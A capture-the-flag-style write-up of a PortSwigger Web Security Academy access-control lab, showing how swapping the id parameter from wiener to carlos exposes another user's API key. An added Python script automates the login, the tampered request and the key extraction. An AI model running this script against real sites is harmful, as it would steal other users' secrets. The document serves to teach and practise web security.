4.3. User ID controlled by request parameter (Web Security Academy)
Web Security Academy >> Access control >> Lab
The goal is to obtain the API key of the user carlos:
We log in with the credentials wiener:peter.
To get the API key we have to reach carlos's account page.
Notice that in the URL the account is selected by a username in the id query parameter, so we can simply change that value to carlos.
We need to change id=wiener to id=carlos.
So we send the request to Burp Repeater:
Change the id and send the request:
The response comes back rendered for the user carlos, even though our session still belongs to wiener. Search the response for "API" in the search box.
Here it is: carlos's API key.
Congratulations, you solved the lab!
We could also have changed the id from wiener to carlos directly in the browser's URL bar and watched what happens. Sometimes that is enough, but on this site it did not work for us, so we replayed the modified request from Burp while still logged in as wiener. Either way the flaw is the same: the server trusts the id value supplied by the client instead of the identity tied to the session cookie, so any authenticated user can read any other user's account page.
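The same steps as a script, added here as an example and not part of the original write-up or of PortSwigger's lab code. It logs in as wiener, requests the account page with id=carlos, confirms the page really belongs to carlos before trusting it, and pulls out the API key. The paths (/login, /my-account), the form field names (username, password, csrf) and the page wording ("Your username is:", "Your API Key is:") are assumptions about the lab's layout; the embedded HTML snippet is constructed so the script also runs offline.

```python
"""Added example: automate the id=wiener -> id=carlos IDOR and extract the key.
Paths, form fields and page wording are ASSUMED from the lab's usual layout."""
import re
import sys
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar
from typing import Optional

LOGIN_PATH = "/login"          # assumed
ACCOUNT_PATH = "/my-account"   # assumed; selects the account via ?id=<username>
ID_PARAM = "id"

# Constructed stand-in for carlos's account page, used for the offline demo.
SAMPLE_RESPONSE = (
    "<h1>My Account</h1><p>Your username is: carlos</p>"
    "<div><p>Your API Key is: <span>AbC123xyz</span></p></div>"
)


def account_url(base_url: str, user: str) -> str:
    """Build the account URL for an arbitrary user. The bug is that the server
    honours this parameter instead of the user bound to the session cookie."""
    query = urllib.parse.urlencode({ID_PARAM: user})
    return f"{base_url.rstrip('/')}{ACCOUNT_PATH}?{query}"


def _text_only(html: str) -> str:
    """Strip tags so matching does not depend on the exact markup."""
    return re.sub(r"<[^>]+>", " ", html)


def extract_api_key(html: str) -> Optional[str]:
    """Return the API key printed on a my-account page, or None if absent."""
    m = re.search(r"API Key is:\s*([A-Za-z0-9]+)", _text_only(html))
    return m.group(1) if m else None


def idor_confirmed(html: str, victim: str) -> bool:
    """Only call it a finding when the page names the victim AND exposes a
    key; a redirect back to our own account or to /login must not count."""
    named = re.search(rf"Your username is:\s*{re.escape(victim)}\b", _text_only(html))
    return bool(named) and extract_api_key(html) is not None


def fetch_victim_key(base_url: str, username: str, password: str,
                     victim: str) -> Optional[str]:
    """Log in as the low-privilege user, then request the victim's page with
    that same session. No victim credentials are used anywhere."""
    jar = CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    login_page = opener.open(base_url + LOGIN_PATH).read().decode()
    # The lab login form carries a hidden anti-CSRF token (assumed name "csrf").
    csrf = re.search(r'name="csrf"\s+value="([^"]+)"', login_page)
    form = {"username": username, "password": password}
    if csrf:
        form["csrf"] = csrf.group(1)
    opener.open(base_url + LOGIN_PATH,
                data=urllib.parse.urlencode(form).encode()).read()
    html = opener.open(account_url(base_url, victim)).read().decode()
    return extract_api_key(html) if idor_confirmed(html, victim) else None


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # usage: python idor_lab.py https://<lab-id>.web-security-academy.net
        print(fetch_victim_key(sys.argv[1], "wiener", "peter", "carlos"))
    else:
        # Offline demo on the constructed response.
        print(account_url("https://example.test", "carlos"))
        print(extract_api_key(SAMPLE_RESPONSE))
```

The idor_confirmed check is the part worth keeping in your own tooling: a 200 response is not proof of access, because many applications silently fall back to the caller's own account or bounce to the login page when the id is wrong. Paste the returned key into the lab's "Submit solution" box to finish.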
See you soon in other reports...!!
Abdelwahab_Shandy
AS_Cyber